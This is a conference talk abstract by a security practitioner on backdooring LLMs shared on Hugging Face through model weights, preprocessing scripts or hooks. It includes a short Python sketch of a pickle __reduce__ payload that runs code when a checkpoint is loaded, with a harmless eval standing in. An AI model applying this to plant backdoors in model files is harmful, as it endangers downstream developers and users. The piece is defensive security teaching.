Backdooring LLMs on Hugging Face: Secure Coding Lessons
The rapid adoption of large language models (LLMs) and the widespread use of open platforms like Hugging Face have introduced new security challenges, particularly in model integrity and supply chain vulnerabilities. This talk explores the feasibility and methodology of backdooring LLMs distributed via Hugging Face, highlighting how subtle code or model manipulations can lead to hidden malicious behavior. Through practical demonstrations, we uncover how backdoors can be implanted in model weights, preprocessing scripts, or post-processing hooks—often without detection. We then transition into secure coding practices and model publishing guidelines aimed at mitigating these risks. By analyzing real-world scenarios and providing actionable recommendations, this work serves both as a cautionary exploration and a guide for developers, researchers, and platform maintainers to adopt more secure practices in the era of open LLM sharing.
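The abstract's point that backdoors can hide in serialized model artifacts can be illustrated with Python's pickle format, which legacy checkpoint formats (such as classic `torch.load` files) build on. The sketch below is hypothetical and harmless: the class name and payload are illustrative stand-ins, not material from the talk. It shows why simply *loading* an untrusted file is enough for attacker code to run.

```python
import pickle

# Hypothetical minimal sketch of a pickle-based backdoor, the class of
# supply-chain attack the talk describes for model files. A harmless
# eval stands in for arbitrary attacker code (shell commands, downloads).

class BackdooredCheckpoint:
    def __reduce__(self):
        # At unpickling time, pickle calls the returned callable with the
        # given args -- no method of this class is ever invoked by the victim.
        return (eval, ("6 * 7",))

blob = pickle.dumps(BackdooredCheckpoint())  # what an attacker uploads
result = pickle.loads(blob)                  # what a victim's load triggers
print(result)  # the attacker-controlled expression has already executed
```

This is why safer serialization formats that store only tensors (e.g. safetensors) and scanning of uploaded artifacts are commonly recommended mitigations for model-hub distribution.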

Davide Cioccia
Founder at DCODX Cybersecurity and Chief Product Officer at SecDim.
Amsterdam, The Netherlands